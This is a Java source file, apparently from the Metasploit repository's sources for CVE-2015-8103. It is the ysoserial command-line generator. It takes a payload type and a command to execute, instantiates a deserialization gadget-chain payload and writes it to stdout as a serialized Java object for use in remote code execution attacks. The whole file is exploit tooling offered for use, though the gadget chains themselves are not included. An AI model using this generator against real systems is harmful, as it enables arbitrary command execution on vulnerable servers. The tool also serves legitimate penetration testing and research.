GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2015-8103/GeneratePayload.java
package ysoserial;
import java.io.ObjectOutputStream;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Collections;
import java.util.Comparator;
import java.util.List;
import java.util.Set;
import org.reflections.Reflections;
import ysoserial.payloads.ObjectPayload;
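/**
 * Command-line front end that turns a payload type name and a command string into a
 * serialized Java object written to standard output.
 *
 * <p>The payload type is resolved to a class implementing {@link ObjectPayload}, instantiated
 * through its no-argument constructor, and asked for an object via {@code getObject(command)}.
 * That object is then written with {@link ObjectOutputStream}, so the bytes on stdout are a
 * standard Java serialization stream. The stream header that {@code ObjectOutputStream} emits
 * (magic {@code 0xACED}, version {@code 0x0005}) is the marker that detections for serialized
 * Java objects in traffic or logs usually key on.
 *
 * <p>Diagnostics and usage text go to stderr only, keeping stdout free for the binary stream.
 */
@SuppressWarnings("rawtypes")
public class GeneratePayload {

    /** Exit status when payload creation or serialization fails (same value as sysexits.h EX_SOFTWARE). */
    private static final int INTERNAL_ERROR_CODE = 70;

    /** Exit status for a wrong argument count or unknown payload type (same value as sysexits.h EX_USAGE). */
    private static final int USAGE_CODE = 64;

    /**
     * Runs the generator and always terminates the JVM through {@link System#exit(int)}.
     *
     * @param args exactly two elements: the payload type (a fully qualified class name or the
     *             simple name of a class in the {@code payloads} sub-package) and the command
     *             string handed to the payload's {@code getObject}
     */
    public static void main(final String[] args) {
        if (args.length != 2) {
            printUsage();
            System.exit(USAGE_CODE);
        }
        final String payloadType = args[0];
        final String command = args[1];

        final Class<? extends ObjectPayload> payloadClass = getPayloadClass(payloadType);
        // getPayloadClass already rejects non-payload classes; the subtype test is kept as a
        // second guard so nothing but an ObjectPayload implementation is ever instantiated.
        if (payloadClass == null || !ObjectPayload.class.isAssignableFrom(payloadClass)) {
            System.err.println("Invalid payload type '" + payloadType + "'");
            printUsage();
            System.exit(USAGE_CODE);
        }

        try {
            // Class.newInstance() is deprecated and rethrows checked constructor exceptions
            // undeclared; going through the Constructor wraps them instead.
            final ObjectPayload payload = payloadClass.getDeclaredConstructor().newInstance();
            final Object object = payload.getObject(command);
            final ObjectOutputStream objOut = new ObjectOutputStream(System.out);
            objOut.writeObject(object);
            // Flush explicitly: the stream is not closed (that would close System.out) and the
            // JVM is about to exit, so do not depend on System.out's auto-flush to emit the tail.
            objOut.flush();
        } catch (Throwable e) {
            System.err.println("Error while generating or serializing payload");
            e.printStackTrace();
            System.exit(INTERNAL_ERROR_CODE);
        }
        System.exit(0);
    }

    /**
     * Resolves a payload type name to its class.
     *
     * <p>The name is tried first as given, then with this class's package name followed by
     * {@code ".payloads."} prepended. A candidate is accepted only if it is a subtype of
     * {@link ObjectPayload}.
     *
     * @param className fully qualified or simple payload class name
     * @return the matching payload class, or {@code null} if neither lookup yields one
     */
    private static Class<? extends ObjectPayload> getPayloadClass(final String className) {
        try {
            return resolvePayloadClass(className);
        } catch (Exception ignored) {
            // Not a payload class under the name as given; try the payloads sub-package next.
        }
        try {
            return resolvePayloadClass(
                    GeneratePayload.class.getPackage().getName() + ".payloads." + className);
        } catch (Exception ignored) {
            // No such payload in the sub-package either; reported to the caller as null.
        }
        return null;
    }

    /**
     * Loads {@code binaryName} without initializing it and narrows it to an
     * {@link ObjectPayload} subtype.
     *
     * <p>Initialization is deferred so that the static initializers of an arbitrary class named
     * on the command line do not run before the class is known to be a payload; the class is
     * initialized later, when it is instantiated.
     *
     * @param binaryName fully qualified class name to load
     * @return the loaded class, typed as a payload class
     * @throws ClassNotFoundException if no class with that name can be found
     * @throws ClassCastException if the class exists but is not an {@code ObjectPayload} subtype
     */
    private static Class<? extends ObjectPayload> resolvePayloadClass(final String binaryName)
            throws ClassNotFoundException {
        return Class.forName(binaryName, false, GeneratePayload.class.getClassLoader())
                .asSubclass(ObjectPayload.class);
    }

    /** Prints the banner, the invocation syntax and the sorted list of payload types to stderr. */
    private static void printUsage() {
        System.err.println("Y SO SERIAL?");
        System.err.println("Usage: java -jar ysoserial-[version]-all.jar [payload type] '[command to execute]'");
        System.err.println("\tAvailable payload types:");
        final List<Class<? extends ObjectPayload>> payloadClasses =
                new ArrayList<Class<? extends ObjectPayload>>(getPayloadClasses());
        Collections.sort(payloadClasses, new ToStringComparator()); // alphabetize
        for (Class<? extends ObjectPayload> payloadClass : payloadClasses) {
            System.err.println("\t\t" + payloadClass.getSimpleName());
        }
    }

    /**
     * Finds the available payload classes by scanning the classpath under this class's package
     * for subtypes of {@link ObjectPayload}.
     *
     * @return the subtypes reported by the Reflections scan
     */
    private static Collection<Class<? extends ObjectPayload>> getPayloadClasses() {
        final Reflections reflections = new Reflections(GeneratePayload.class.getPackage().getName());
        final Set<Class<? extends ObjectPayload>> payloadTypes = reflections.getSubTypesOf(ObjectPayload.class);
        return payloadTypes;
    }

    /** Orders arbitrary objects by the natural ordering of their {@code toString()} values. */
    public static class ToStringComparator implements Comparator<Object> {
        /**
         * @param o1 first object, must not be {@code null}
         * @param o2 second object, must not be {@code null}
         * @return the result of comparing {@code o1.toString()} with {@code o2.toString()}
         */
        public int compare(Object o1, Object o2) {
            return o1.toString().compareTo(o2.toString());
        }
    }

}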